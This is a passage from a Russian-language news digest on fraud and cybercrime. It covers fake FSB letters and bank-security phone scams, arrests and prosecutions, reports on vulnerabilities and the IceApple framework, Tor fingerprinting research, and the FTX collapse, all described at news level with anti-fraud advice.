Руководитель юридической службы компании IDX Михаил Тевс, по просьбе CNews изучивший документ, нашел в нем целый ряд признаков подделки. «Возбуждение уголовного дела в отношении юридического лица – это провал, уголовные дела могут возбуждаться только в отношении граждан, – говорит Тевс. - Кроме того, не существует таких понятий, как «закрытое расследование» и «закрытый канал связи». Правонарушение может быть только административным, а уголовные нарушения – это всегда преступления. Также граждане привлекаются к ответственности только в соответствии с Уголовным кодексом без применения каких-либо других законов, тем более что закон №63 посвящен электронной подписи».
Юрист указал и на другие, менее значительные ляпы мошенников: на документе стоят реквизиты управления ФСБ по Москве и Московской области, но подписан он первым замруководителя всего ведомства (имя руководителя московского управления ФСБ можно легко найти в интернете); у подписанта помимо должности, указано еще и его звание, что является редкостью; наличие одновременно собственноручной и электронной подписи является избыточным.
На что рассчитывают мошенники
Основатель сервиса разведки утечек данных и мониторинга теневого интернета DLBI Ашот Оганесян называет произошедшее «распространенной схемой мошенничества, набирающей популярность в последнее время». «Для реализации такой схемы нужны только персональные данные жертвы и ее руководителя, которые, как правило, находятся в открытом доступе - например, имя и фото», - говорит эксперт.
Целью мошенников являются персональные данные сотрудников, которые могут быть использованы для атак и на них самих, и на компанию. В первом случае, объясняет Оганесян, жертвам будут «звонить из Центробанка» с предложением перевести деньги на «безопасный счет». Во втором случае бухгалтеры и ассистенты получат от якобы директора поддельные распоряжения об оплате.
«В последние годы злоумышленники все чаще предпринимают попытки мимикрировать под государственные структуры, выдавая себя за представителей силовых ведомств, регуляторов или министерств, - констатирует руководитель группы защиты от почтовых угроз «Лаборатории Касперского». - Цель – запугать получателя последствиями (уголовными делами, многомиллионными штрафами и т.д.), чтобы жертва, в конечном счете, выполнила указанные в сообщении требования. Иногда злоумышленник действуют в несколько этапов, например, предупреждают в письме о предстоящем звонке, а уже в ходе разговора выманивают конфиденциальные сведения. Подобные методы социальной инженерии призваны вызвать у потенциальной жертвы панику и заставить ее действовать необдуманно».
Как не стать жертвой мошенников
В группе компаний InfoWatch указывают, что в подавляющем большинстве случаев подобного рода письма «от ФСБ», «от МВД» и др. – обычное мошенничество, рассчитанное на впечатлительных сотрудников.
«Опытный специалист, которые работает с подлинными запросами от силовых структур и ведомств, определит подделку сразу в момент прочтения, - полагают в компании. – Характерные признаки – это грамматические ошибки, разговорные, неюридические формулировки или, наоборот, нагромождение сложных оборотов, некорректные логотипы, слишком яркие нарисованные оттиски печатей и так далее. Еще один индикатора мошеннической направленности письма – акцентирование побуждение адресата к действию, высокая срочность, игра на эмоциях и чувствие ответственности».
В InfoWatch добавили, что для подобных писем настоящие ведомства никогда не использует электронную почту как единственный канал коммуникаций: такую корреспонденцию в бумажном виде могут направить на адрес организации, заказным письмом или через системы электронного документооборота, и продублировать через электронную почту. Если это письмо пришло только на адрес электронной почты, то это повод считать его мошенничеством.
Ашот Оганесян напоминает, что сотрудники правоохранительных органов никогда подобным образом не звонят и не направляют через мессенджеры сканов своих удостоверений и прочих документов. В реальности сотрудники правоохранительных органов присылают повестки или приходят сами, а по телефону, как максимум, приглашают к себе.
Что касается фальшивых сообщений сотрудникам организаций якобы от их руководителя в мессенджере, то с ними сложнее бороться. «Большинство сотрудников впадают в ступор, получив такое сообщение, и пытаются верифицировать отправителя, связавшись с ним по другим каналам, - рассуждает эксперт. - Бороться с этим можно только с помощью корпоративных политик безопасности, например, запрещающих деловые коммуникации везде, кроме корпоративных мессенджеров».
Уязвимости в WebOS: что нужно знать владельцам LG?
Исследователи из Bitdefender
обнаружили четыре уязвимости
в операционной системе WebOS, позволяющие злоумышленникам несанкционированно
контролировать телевизоры LG. Уязвимости включают обход авторизации, повышение
привилегий и инъекцию команд.
Анализ сети показал, что около 91 000 телевизоров LG с WebOS доступны в
интернете, делая их потенциальными целями для атак.
LG выпустила обновления безопасности после сообщения Bitdefender, но многие
пользователи могут откладывать их установку.
Лжебизнесмен из Ельска брал предоплату за товар и на связь больше не выходил, сообщили в УВД Гомельского облисполкома.
В Ельске задержан 19-летний парень, который в мессенджерах обещал выполнить практически любой заказ. В каждом случае требовал предоплату. "Покупатели же получали от него только фото. После получения денег он на связь не выходил", - рассказали в УВД.
В начале декабря во время переписки он пообещал мужчине из Витебской области привезти из Польши передний бампер с решеткой от грузовика. За деталь запросил 280 евро. Для доставки потребовал сделать частичную предоплату. Затем убеждал заказчика, что все идет по плану: деталь выехала из соседней страны, доставлена в Брест, скоро курьер доставит к месту назначения. Затем связь прекратилась. Мужчина обратился в милицию.
17 ноября в переписке в одном из интернет-сообществ лжебизнесмен удачно "продал" стартер от трактора жителю одной из деревень Солигорского района Минской области. Заплатив более Br100, покупатель получил лишь фото товара. В ноябре Br350 за диван на его банковскую карточку перевела жительница Минска. Как напоминание о сделке у нее осталось тоже только фото. По данным фактам следователи возбудили уголовные дела за мошенничество.
Как оказалось, парень уже проходил подозреваемым по уголовному делу о мошенничестве. В этом году он таким же образом продал сельчанину корову. Правоохранители проверяют возможную причастность задержанного к совершению аналогичных преступлений.
При этом парень и ранее совершил немало "сделок", имеющих уголовную квалификацию. В апреле - мае он украл $910 у мужчины из Речицы. В июне - июле в Мозыре на рынке продал ноутбук, который ему передал во временное пользование учащийся местного училища олимпийского резерва. По данным фактам следователи возбудили уголовные дела.
Злоумышленники под видом букмекерской компании принимали ставки от граждан. В дальнейшем они не выполняли свои обязательства по выплате прибыли и вложенные средства также не возвращали. Установлено, что на их банковские счета поступило почти 400 тыс. гривен от 18 пострадавших граждан.
Противоправную деятельность преступной группы разоблачили и задокументировали следователи следственного управления ГУНП в Днепропетровской области. Полицейские установили, что в начале 2023 года злоумышленники арендовали помещение в г. Кривой Рог, оборудовали его компьютерной техникой и организовали «колцентр». Для этого набрали около 20 юношей и девушек, которые под видом приема ставок от букмекерской компании обманывали людей.
8 ноября по местам проживания подозреваемых и работников «колцентра» в г. Кривой Рог и в Криворожском районе прошли санкционированные обыски с участием работников полка полиции особого назначения. По их результатам было изъято почти 9 тыс. долларов и 23 тыс. гривен, 2 автомобили, 31 мобильный телефон, компьютеры, ноутбуки, банковские карты, черновики, а также 2 травматические пистолеты и автоматическая винтовка с патронами.
Сейчас семи мужчинам вручены уведомления о подозрении по ч. 4 ст. 190 Уголовного кодекса Украины (мошенничество). 8 ноября фигурантам избрали меры пресечения в виде содержания под стражей.
Следственные мероприятия состоялись при участии работников УСБУ в Днепропетровской области.
Злоумышленники совершали преступления под видом работников службы безопасности банка на территории Харьковской области и других регионов Украины. Установлена причастность фигурантов к более чем 20 мошенничествам.
В Харьковский РУП № 2 с заявлением обратился мужчина. Он сообщил, что неизвестные под видом работников службы безопасность банка завладели его деньгами в сумме 47800 гривен.
Следователи открыли уголовное производство по ч. 3 ст. 190 (мошенничество) Уголовного кодекса Украины.
26 сентября сотрудники Управления уголовного розыска ГУНП в Харьковской области совместно с работниками ХРУП № 2 при силовой поддержке полка полиции особого назначения с использованием возможностей Управления уголовного анализа пресекли деятельность преступной группы. В ее состав вошли 20 и 25-летние мужчины, а также 17-летняя девушка.
Правоохранители установили, что сначала злоумышленники подыскивали лиц, звонили потенциальным потерпевшим под видом работников службы безопасности банка и сообщали, что деньги, которые находятся на карточных счетах могут быть несанкционированно списаны и с целью недопущения указанных действий получали от потерпевших пароль от мобильных банковских приложений, номера банковских карт, CVV. Затем с карточек пострадавших списывались средства. Отдельные лица осуществляли обналичивание денег в банковских терминалах. Параллельно осуществлялся подбор людей, на карточки которых перечислялись средства.
В ходе санкционированных обысков изъяты мобильные терминалы, стартовые пакеты операторов мобильной связи, платежные карты, компьютерная техника, обнаружена переписка на мобильных устройствах и рукописные заметки.
Также во время проведения обыска в квартире по месту проживания злоумышленников обнаружена растительная смесь в стеклянной банке, самодельные принадлежности для курения и разнообразные вайпы.
По результатам проведенных следственно-розыскных мероприятий установлена причастность фигурантов к более чем 20 мошенничествам с использованием ИР- телефонии под предлогом звонков работников службы безопасности банков.
• Source: hk.npu.gov.ua/news/politsiia-vstanovyla-hrupu-osib-prychetnykh-do- shakhraiskykh-dii-z-vykorystanniam-ip-telefonii
Ему грозит до пяти лет лишения свободы.
В Кирове возбуждено уголовное дело против жителя областного центра, который подозревается в неправомерном доступе к охраняемой компьютерной информации с использованием вредоносных программ.
По данным следствия, подозреваемый, преследуя корыстные цели, нейтрализовал защиту информационной системы одного из региональных медицинских информационно-аналитических центров, входящего в перечень критической инфраструктуры Российской Федерации. Затем он изменил содержащуюся в системе информацию, чем нанес ей вред и создал угрозу ее функционирования.
Факт противоправной деятельности выявили сотрудники УФСБ России по Кировской области. В настоящий момент ведется расследование уголовного дела, следствием устанавливаются все обстоятельства совершения преступления.
Подозреваемому грозит до пяти лет лишения свободы.
Прокуратура Могилевской области направила в суд уголовное дело в отношении 36-летнего могилевчанина, которому инкриминированы незаконные с целью сбыта приобретение, хранение и перевозка особо опасных психотропных веществ в крупном размере и наркотических средств.
Согласно материалам дела обвиняемый в августе 2023 года создал и администрировал интернет-ресурс для распространения психоактивных субстанций.
Размещая на нем сведения о наличии запрещенного к обороту товара, мужчина сам приобретал и готовил партии вещества к распространению, в том числе делал «закладки» на территории г.Могилева.
После оперативно-розыскных мероприятий сотрудники органов внутренних дел 10 января 2024 года задержали его. При проведении процессуальных действий по месту жительства обвиняемого, а также в местах сделанных им «закладок» правоохранители обнаружили около 20 грамм запрещенных к обороту субстанций.
Уголовное дело находилось в производстве управления Следственного комитета Республики Беларусь по Могилевской области.
После изучения материалов уголовного дела в прокуратуре Могилевской области пришли к выводу об обоснованности обвинения, наличии достаточных, относимых и допустимых доказательств, полном и объективном исследовании обстоятельств преступления. Согласились с квалификацией содеянного по ч.3 ст.328 Уголовного кодекса Республики Беларусь.
Ранее примененную к обвиняемому меру пресечения в виде заключения под стражу прокурор оставил без изменения.
belta.by/incident/view/zhitel-mogilevskoj-oblasti-predstanet-pered-sudom-za- organizatsiju-narkoshopa-519178-2022
Сотрудники полиции задержали 22-летнего жителя Ставропольского края, который в Интернете был известен как успешный криптоинвестор, сообщает пресс-служба ГУ МВД РФ.
Парень в Интернете выступал под чужим именем. Он выкладывал в социальные сети фото и видео с элитной квартирой в Санкт-Петербурге и дорогой машиной. Кроме того, показывал биржевые сводки с примерами успешных инвестиций, а некоторым из клиентов даже выплачивал дивиденды.
Как выяснилось, квартира и машина «инвестора» - в краткосрочной аренде, видео с биржевыми котировками – симуляция, положительные отзывы «накручены», а выплаченные дивиденды –способ получить еще больше денег от доверчивых граждан.
Так парню удалось ввести в заблуждение 45 жителей страны. Они перевели ему в общей сложности более 3 млн рублей.
Сейчас следователи устанавливают личности всех потерпевших в результате реализации криминальной схемы. Возбуждено уголовное дело, молодой человек находится под стражей.
Обманутой оказалось женщина, которая до этого проводила беседы, как не стать жертвой мошенников
51-летняя директор одной из школ Улан-Удэ стала жертвой мошенников. Она перевела неизвестным более 2 миллионов 700 тысяч рублей.
Как сообщили в пресс-службе МВД по Бурятии, 7 марта женщине в мессенджере написала якобы руководитель из администрации Улан-Удэ. Она предупредила, что «из ФСБ запросили характеристики на всех работников образовательной организации». И написала: скоро поступит звонок от куратора от ФСБ.
Позднее улан-удэнке, действительно, позвонил некто, представившийся сотрудником спецслужбы. Он сразу же обвинил женщину в связях с внешнеполитическим врагом. Потерпевшая, конечно, всё отрицала.
Тогда лжесотрудник ФСБ «признал»: вероятно, в деле замешаны мошенники, которые пытаются оформить на её имя кредиты. Чтобы не позволить им этого сделать, необходимо взять займы самой, убеждал звонивший.
Поверив неизвестному, улан-удэнка взяла кредит на 1,2 млн рублей. В качестве цели в банке указала покупку автомобиля. Деньги она сразу же перечислила на номер указанной карты.
Затем, сославшись на ту же причину, попыталась взять ещё миллион кредитных средств в другом банке. Однако на этот раз добросовестные работники банка заподозрили неладное, стали отговаривать клиентку от операции, а поскольку она их не слушала, остановили выдачу уже одобренного кредита.
О ситуации они сообщили сотрудникам оперативно-сыскного отдела. Полицейские приехали, но даже им не удалось убедить женщину, что её обманывают.
После отъезда полицейских она, продолжая общение с интернет-преступниками, оформила займ на миллион рублей в онлайн-режиме. Обналичив средства, через банкомат зачислила на указанный счет.
Когда на следующий день злоумышленники позвонили ей снова и объяснили, что для закрытия кредитов нужно подтвердить платежеспособность, переведя ещё 537 тысяч рублей, улан-удэнка заняла деньги в долг у подруги. И вновь вместе с собственными сбережениями направила аферистам.
Усомниться в своих действиях её заставил очередной звонок настоящих сотрудников полиции. Женщина решила перепроверить информацию, полученную от якобы профильного руководителя из мэрии, и набрала её саму. Только когда чиновница администрации лично подтвердила, что не писала никаких сообщений, жертва поняла, что была обманута.
При этом потерпевшая не раз участвовала в различных мероприятиях по профилактике телефонных и интернет-мошенничеств. И более того, сама организовывала подобные беседы в образовательном учреждении.
Следствием возбуждено уголовное дело о мошенничестве в крупном размере.
Бизнесмен из Онтарио стал жертвой мошенников, которые с помощью подделки чеков украли у него 38 тысяч канадских долларов (2,72 миллиона рублей). По сведениям местного телеканала CTV News Toronto, владелец небольшой компании Джо Джон (Joe John) всегда с недоверием относился к онлайн-банкингу, из-за чего его и смогли развести преступники.
За последние три десятилетия предприниматель ни разу не пользовался никакими способами взаимодействия с финансовой системой, кроме личных визитов в отделения. Именно из-за этого, когда кто-то скопировал его чек и создал на его основе восемь других, поддельных, после чего загрузил на созданный онлайн-счет их изображения и смог затем положить их на счет и обналичить, бизнесмен об этом даже не узнал.
В итоге с его счета таким нехитрым способом сняли более 60 тысяч канадских долларов, однако первые два мошеннических транша банк возместил. Все оставшееся возвращать отказался, мотивировав это тем, что Джон не сообщил о проблеме в течение 48 часов после ее возникновения.
«TD Bank заявляет, что не собирается возвращать деньги, потому что я не сообщил об этом своевременно. Как я мог сделать это, если у меня нет онлайн- банкинга?» — вроде как справедливо вопрошает жертва.
По словам Джона, он получает выписку со своего счета раз в месяц. Бизнесмен шокирован тем, что ему приходится покрывать убытки, и добавляет, что это вынудит его закрыть свой бизнес. Решение проблемы пока не найдено.
source: cp24.com/news/ontario-businessman-loses-38k-in-cheque-cashing- scam-1.6577776
Binance заключила соглашение о продаже всего своего российского бизнеса компании CommEX. С целью обеспечения планомерного перехода существующих пользователей на другую платформу, процесс отключения займет до одного года. Все активы текущих российских пользователей в безопасности и надежно защищены.
“Смотря в будущее, мы признаем, что работа в России несовместима со стратегией Binance по соблюдению требований”, — сказал Ной Перлман, директор по соблюдению нормативных требований. “Мы по-прежнему уверены в долгосрочном развитии индустрии Web3 на глобальном уровне и собираемся направить нашу энергию на развитие Binance в более чем ста странах, где мы ведем нашу деятельность”.
В ходе организованной и последовательной миграции пользователей Binance совместно с CommEX примут все необходимые меры для информирования пользователей о процедуре переноса их активов на платформу CommEX. Новые пользователи, прошедшие процедуру верификации персональных данных, будут частично перенаправлены на платформу CommEX.
В течение следующих нескольких месяцев Binance закроет биржевые сервисы и прочие бизнес-направления в России, прилагая все усилия для обеспечения бесперебойного взаимодействия с пользователем во время этого перехода.
Несмотря на то, что финансовые подробности сделки остаются конфиденциальными, следует отметить, что в рамках этого соглашения Binance полностью прекращает свою деятельность в России. В отличие от сделок, ранее осуществленных международными компаниями в России, в рамках данной сделки у Binance не останется права на получение части прибыли после продажи и возможности обратного выкупа долей в бизнесе.
source: binance.com/ru/blog/all/binance-объявляет-об-уходе-из-россии-и- продаже-российского-бизнеса-компании-commex-8578760889994024403
Эксплойт создан опытным разработчиком и имеет хорошую защиту от обнаружения.
Исследователи безопасности обнаружили новую платформу для последующей
эксплуатации под названием IceApple , развернутую на серверах Microsoft
Exchange.
IceApple является очень изощренным эксплойтом с возможностью сдерживания
долгосрочных целей при целенаправленных атаках. Фреймворк был обнаружен в
конце 2021 года командой по поиску активных угроз OverWatch CrowdStrike и
находится в стадии активной разработки. Исследователи наблюдали развертывание
IceApple после получения злоумышленником доступа к сети, принадлежащей
организациям в технологическом, академическом и правительственном секторах
деятельности.
По словам исследователей, IceApple был развернут на экземплярах Microsoft
Exchange Server, но он также может работать в веб-приложениях Internet
Information Services (IIS). Платформа основана на .NET и поставляется с 18
модулями с определенными функциями для обнаружения соответствующих компьютеров
в сети, кражи учетных данных, удаления файлов и каталогов или извлечения
ценных данных. Команда OverWatch CrowdStrike предполагает участие Китая в
кибератаках IceApple.
Разработчик IceApple хорошо разбирается в программном обеспечении IIS. На это
указывает наличие модуля недокументированных полей, которые не предназначены
для сторонних разработчиков.
«Детальный анализ модулей позволяет предположить, что IceApple был разработан
злоумышленником с глубокими знаниями о внутренней работе программного
обеспечения IIS», - сказали эксперты CrowdStrike OverWatch.
Модули IceApple работают в памяти и не привлекают внимания к
скомпрометированному хосту для уменьшения следа криминалистической экспертизы.
Также для поддержания скрытности эксплойт проникает в скомпрометированную
среду путем создания файлов сборки, которые, возможно, временно генерируются
Microsoft IIS сервером.
«На первый взгляд они кажутся ожидаемыми временными файлами IIS, созданными
как часть процесса преобразования исходных файлов ASPX в .NET для загрузки
IIS» - сказали исследователи.
Файлы были созданы не случайным образом и загружены способом, не типичным для
Microsoft Exchange и IIS. Облачное решение безопасности CrowdStrike Falcon
вызвало предупреждение при развертывании нового клиентского модуля Microsoft
OWA (Outlook on the web) в .NET среде и позволило обнаружить IceApple.
Возможно, в будущем разработчик добавит в IceApple больше модулей и адаптирует
фреймворк к технологиям обнаружения.
Команда не предоставила точное число жертв эксплойта, но сообщила о вторжениях
в нескольких средах пользователей и порекомендовала устанавливать последние
обновления всех веб-приложений для надежной защиты от возможных угроз
IceApple.
Кургане
Обвиняемому грозит до пяти лет лишения свободы.
Уголовное дело возбуждено в отношении жителя Курганской области по факту попытки взлома сайтов государственных учреждений, в том числе Министерства здравоохранения Чеченской Республики и Алтайского государственного университета (АлтГУ). Об этом сообщили в пресс-службе УФСБ России по региону.
"В отношении 35-летнего жителя города Шумихи следственным подразделением УФСБ России по Курганской области расследуется уголовное дело по признакам преступления, предусмотренного ч. 1 ст. 273 УК РФ ("Использование компьютерной программы, заведомо предназначенной для уничтожения или нейтрализации средств защиты компьютерной информации")", - говорится в сообщении.
По данным следствия, мужчина со своего домашнего компьютера незаконно использовал вредоносную программу, предназначенную для несанкционированной нейтрализации средств защиты компьютерной информации. С ее помощью хакер пытался взломать сайты Министерства здравоохранения Чеченской Республики, Алтайского государственного университета и портала муниципальных услуг г. Иваново.
Обвиняемому грозит до пяти лет лишения свободы.
Исследователи в области кибербезопасности рассказали о новой атаке с отслеживанием цифрового отпечатка зашифрованного трафика web-браузера Tor. Атакующий может определить посещаемый пользователем сайт, но только если злоумышленник интересуется определенной выборкой сайтов.
«В то время как точность атаки при мониторинге небольшой группы из пяти популярных web-сайтов может превышать 95%, точность неизбирательных (нецелевых) атак на группы из 25 и 100 web-сайтов не достигает 80% и 60% соответственно», — пояснили эксперты.
Браузер Tor предлагает своим пользователям возможность маршрутизации интернет- трафика через оверлейную сеть, состоящую из более чем шести тысяч ретрансляторов, с целью анонимизации исходного местоположения. Это достигается путем создания цепи, которая проходит через входной, средний и выходной узлы перед пересылкой запросов на IP-адреса назначения. Кроме того, запросы шифруются один раз для каждого узла, дополнительно затрудняя анализ и избегая утечки информации. Хотя сами клиенты Tor не являются анонимными в отношении своих входных узлов, поскольку трафик зашифрован, а запросы проходят через несколько переходов, входные узлы не могут идентифицировать место назначения клиентов, так же как выходные узлы не могут различить клиентов.
Предложенный исследователями метод направлен на нарушение данной защиты анонимности и позволяет злоумышленнику наблюдать за паттернами зашифрованного трафика между пользователем и сетью Тор для прогнозирования посещаемого сайта. В ходе атаки злоумышленник запускает выходной узел для определения разнообразия трафика, генерируемого реальными пользователями, который затем используется в качестве источника для сбора следов трафика Tor и разработки модели классификации на основе машинного обучения поверх собранной информации, позволяя сделать вывод о посещениях сайтов пользователями.
В рамках исследования специалисты запускали входные и выходные узлы в течение недели в июле 2020 года с использованием специальной версии Tor v0.4.3.5 для извлечения соответствующей информации с выходного узла.
«Как показали результаты исследования, атаки с отслеживанием цифрового отпечатка браузера могут быть успешными только в том случае, если злоумышленник стремится идентифицировать web-сайты в небольшой группе», — отметили эксперты.
• Source: https://www.usenix.org/conference/usenixsecurity22/presentation/cherubin
• Source: https://www.usenix.org/system/files/sec22summer_cherubin.pdf
Житель штата Флорида Конрад Бернард признал себя виновным в финансовом мошенничестве, благодаря которому обогатился на 1,08 миллиона долларов. 24-летний американец получил эти деньги из фондов Программы по борьбе с безработицей, а также Программы займов на случай экономического ущерба (EIDL).
Известно, что с мая 2020 года по декабрь 2022-го Бернард подал заявки от имен других людей на 14 пособий EIDL, используя левые персональные данные без ведома их реальных обладателей и без их согласия. После одобрения он выводил полученные средства через различные банки сначала на счета самих жертв, а затем и на свои. Что касается пособий по безработице, то они выплачивались в нескольких штатах, в том числе в Западной Вирджинии и Аризоне.
Во время обысков у мужчины нашли множество поддельных удостоверений личности, водительских прав и других документов на посторонних людей. Приговор ему объявят 5 февраля 2025 года, максимальное возможное наказание — 30 лет тюрьмы за банковское мошенничество и обязательные два года за кражу личных данных с отягчающими обстоятельствами.
cbsnews.com/miami/news/broward-man-pleads-guilty-1-million-covid-19-relief- fraud
Как сообщают Сумские правоохранители, 51-летняя женщина еще в июне 2024 года начала переписывать в ТикТоке с неизвестным мужчиной, который назывался Джефом. Они вели диалог на разные темы, тем самым узнавая о друг друге все больше информации. Как только ее было достаточно — скамер приступил к действию.
Он сказал, что вдовец и работает военным хирургом-ортопедом. Самостоятельно работяга воспитывает якобы двоих детей — 9 и 11 лет и ему срочно нужны деньги для переезда в США навсегда. Не совсем понятно, как скамеру удалось убедить мамонтообразную, но с конца сентября до начала ноября она скидывала деньги на 20 разных карточек.
— В итоге сумма подошла уже к 300 тысяч гривен, когда она наконец поняла, что почти полгода общалась с ненасытным скамером, Пришлось обращаться в полицию. Возбуждено дело по ст. 190 ч.2.
Очередной телефонный мошенник, сняв с чужого счета 7175,99 евро, воспользовался банковским счетом своей бабушки для "отмыва" части денег.
Как выяснилось в ходе следствия, внук не сообщил пожилой даме о том, что использует ее банковскую карту для легализации украденныз денег.
Самозванец увел 7 176 евро
Подробности Госполиция сообщает такие:
13 октября 2023 года рижские полицейские начали уголовный процесс о мошенничестве.
Как выяснилось, пострадавшему позвонил человек, выдававшего себя за сотрудника полиции и сообщил потерпевшему, что в банк пришло некое лицо с доверенностью от его имени и попыталось оформить кредит.
Позже потерпевший был соединен с другим самозванцем, который выдавал себя за представителя банка и предлагал застраховать находящиеся на банковском счете деньги - перевести их на другой счет. Для этого от жертвы потребовали установить на его смарт-устройство программу AnyDesk, после чего он подключился к интернет-банку через Smart-ID, и в результате с его банковского счета "ушли" 7 175,99 евро.
В тот же день молодой человек (2004 г. р.), незаконно используя банковскую карту своей бабушки, осуществил две денежные выплаты. О такой активности на своем банковском счете она не знала.
Вскоре полицейские подозреваемого задержали.
Ранее в поле зрения полиции молодой человек не попадал, ему избрана мера пресечения, не связанная с лишением свободы. Следствие продолжается.
Что очевидно: вопросы правоохранителей об "отмывах" через ее карточку, оказались весьма неприятными для бабушки.
Что за это грозит
По факту произошедшего начат уголовный процесс, квалифицированный по части второй статьи 193-й Уголовного закона — за похищение, уничтожение, повреждение или незаконное использование чужого финансового инструмента или платежного средства, или за приобретение, хранение, перемещение или распространение похищенного платежного средства.
За такое преступление грозит лишение свободы на срок до пяти лет, или кратковременное лишением свободы, или общественные работы, или штраф. С конфискацией имущества или без таковой.
Кроме того, уголовный процесс квалифицирован по части первой статьи 195-й Уголовного закона, а именно по факту легализации полученных преступным путем финансовых средств или другого имущества. За такое преступление грозит лишение свободы на срок до четырех лет, или кратковременное лишение свободы, или надзор пробации, или общественные работы, или штраф с конфискацией имущества или без таковой.
• Source: [https://www.vp.gov.lv/lv/jaunums/ja...tu-krapnieciski-iegutu- lidzeklu-legalizacijai](https://www.vp.gov.lv/lv/jaunums/jaunietis-izmantojis- vecasmates-bankas-kontu-krapnieciski-iegutu-lidzeklu-legalizacijai)
Критическая брешь в HTTP/2: CONTINUATION Flood приводит к мощнейшим DoS- атакам
Исследователь в области кибербезопасности Бартек Новотарски
обнаружил уязвимость в протоколе
HTTP/2, получившую название «HTTP/2 CONTINUATION Flood».
****Злоумышленник
может использовать эту уязвимость для DoS-атаки, отправив бесконечный поток
заголовков, что приведет к переполнению памяти сервера и его аварийному
завершению работы.
Брешь
затрагивает множество популярных проектов, таких как Apache HTTP Server,
Apache Tomcat, Golang и Node.js. В качестве временного решения рекомендуется
отключить поддержку HTTP/2 на сервере, до применения обновления, чтобы
избежать потенциальных атак.
#CyberSecurity #HTTP2Vulnerability #DoSAttack
Теперь его обвиняют в мошенничестве в сфере кредитования
В результате проведенного комплекса оперативно-розыскных мероприятий полицейские из Ульяновской области задержали 18-летнего жителя города Чебоксары (Республики Чувашия). Молодой человек подозревается в серии мошеннических действий.
Предварительно установлено, что через интернет злоумышленник приобрел сим- карты, после чего начал проверять их на предмет наличия привязки к телефонному номеру личного кабинета портала «Госуслуг». Обнаружив несколько привязок, чебоксарец получил доступ к личным кабинетам, где уже от имени потерпевших начал отправлять заявки на получения кредитов в микрофинансовые организации.
Таким образом, молодой человек подозревается в 7 эпизодах противоправной деятельности, совершенных в отношении жителей Димитровграда и Новоспасского района Ульяновской области. Свою вину задержанный полностью признал.
Было возбуждено сразу 2 уголовных дела: по статьям о мошенничестве в сфере кредитования и неправомерного доступа к компьютерной информации.
Суд в Ростове-на-Дону вынес решение в споре между продавцом торгового киоска и
покупателем. При этом в соглашении между сторонами прописано, что юридическую
силу имеют документы, отправленные по электронной почте и просим каналам
связи. В суд покупатель обратился из-за того, что продавец в срок не поставил
в срок киоск и отказался возвращать задаток, так как не было допсоглашения по
срокам и цвету. Но этот момент обсуждался в мессенджере. И итогом был ответ
покупателя в виде смайлика
«».
Суд вынес решение, что данный символ при общении в Интернете означает
«хорошо», а продавец не потребовал уточнений. В итоге суд вынес решение, что
допсоглашение не требуется в данном случае и продавец обязан вернуть деньги за
нарушение сроков.
Порядка 86% utility-токенов FTX (FTT) изначально контролировались самой биткоин-биржей и также связанной с Сэмом Бэнкманом-Фридом Alameda Research. Такие выводы содержатся в исследовании Nansen.
Специалисты компании на базе сетевых данных выявили группу кошельков, которые указали на роль Alameda Research в качестве одного из первых поставщиков ликвидности для FTX в мае 2019 года.
Из первоначальных 350 млн эмиссии FTT 280 млн контролировала сама биржа.
27 млн из 59,3 млн FTT, размещенных в ходе частных и посевного раундов, предположительно, оказались на кошельке Alameda в FTX.
Все токены биржи, включая большинство непроданных, депонировали на адрес с
трехлетним вестингом торговой фирмы в качестве единственного бенефициара.

По мнению аналитиков, это привело к ограничению ликвидности токенов, что сделало их восприимчивыми к манипуляциям.
В условиях бычьего рынка 2021 года, когда цена на FTT взлетела с $0,1 до $84, аффилированные организации решили «не продавать в рынок», а использовать токены в качестве обеспечения для заимствований. В сентябре того же года Alameda Research таким образом использовала FTT стоимостью $1,6 млрд в сделке с Genesis Trading.
Торговая фирма Бэнкмана-Фрида направляла полученные средства для пампа
utility-токена и, как следствие, повышения возможного левериджа.

Эта схема работала вплоть до вызванного коллапсом Terra падения рынка в июне
2022 года.
С прекращением деятельности таких фирм, как Three Arrows Capital и Celsius,
которые имели отношение к Genesis Trading, Alameda, вероятно, столкнулась с
делевериджем и кризисом ликвидности, указали специалисты.
Проблемы можно было решить за счет продажи FTT за наличные. Побочным эффектом
стало бы падение цены актива и «заражение» FTX.
Ончейн-данные показали перевод в мае-июне Alameda токенов на кошелек биржи
суммарно стоимостью ~$4 млрд с последующим возможным привлечением кредита на
аналогичную сумму, что подтвердили осведомленные источники.
Эксперты допустили, что полученное торговой фирмой экстренное финансирование
могло состоять из клиентских средств FTX.
Проблемы вскрылись 6 ноября, когда CEO Binance Чанпэн Чжао решил избавиться от
FTT. Активы вместе с BUSD суммарно на ~$2,1 млрд стали итогом выхода компании
из портфельной инвестиции в FTX. Толчком к этому могло стать расследование
CoinDesk, в котором приводились подробности отчетов Alameda Research с
указанием высокой доли FTT в балансе.
Этот шаг напугал инвесторов и одновременно вызвал как банкротство биржи, так и
сильное давление со стороны продавцов на utility-токен, указали в Nansen.
Вскоре пользователи поняли, что у FTX нет достаточной ликвидности.
11 ноября биржа, Alameda Research и еще примерно 130 аффилированных фирм
подали заявление о банкротстве.
Ранее аналитики Glassnode обратили внимание на совпадение старта тенденции
снижения биткоин-резервов FTX с коллапсом экосистемы Terra.
Эксперты Coin Metrics предположили, что возможной причиной краха биржи могла
стать «крупная финансовая помощь», которую она оказала Alameda Research во
втором квартале 2022 года.
В сентябре в Bloomberg указали на потенциальный конфликт интересов между FTX и
торговой фирмой на основе анализа сетевых данных.
Напомним, Конгресс США заинтересовался ролью Binance во внезапном коллапсе
конкурента. Слушания на эту тему пройдут уже в декабре.
16 ноября Genesis Trading заморозила вывод средств и выдачу новых займов.
IARPA инициирует исследования по автоматическому определению авторства программ (кода)
Это как определение авторства текста по особенностям построения фраз, использованию определенных слов и словосочетаний, устойчивых ошибок и других признаков. Но в коде программ и в комментариях к коду.
Цель - автоматическая идентификация автора программы, особенно вредоносной.
Authorship Exploration RFI ](https://www.iarpa.gov/newsroom/article/annotated- malicious-binaries-and-surrogate-source-code-for-authorship-exploration-rfi)
IARPA is seeking information about annotated binary and source code datasets to explore authorship (for benign tools, malicious tools, or penetration testing tools) that have been annotated with relevant information that could be obtained and made available to research partners in potential...
 www.iarpa.gov
32-летний американец Макферсон Осемвеги признал себя виновным в банковском мошенничестве и мошенничестве с использованием электронных средств. Злоумышленник вместе с подельниками участвовал в ряде романтических афер, заставляя жертв отправлять деньги на счета, контролируемые им и другими мошенниками. Чтобы обмануть доверчивых пользователей, Осемвеги и его “партнеры” создавали фейковые аккаунты, выдавали себя за других людей, соблазняли жертв, выманивали у них деньги и исчезали.
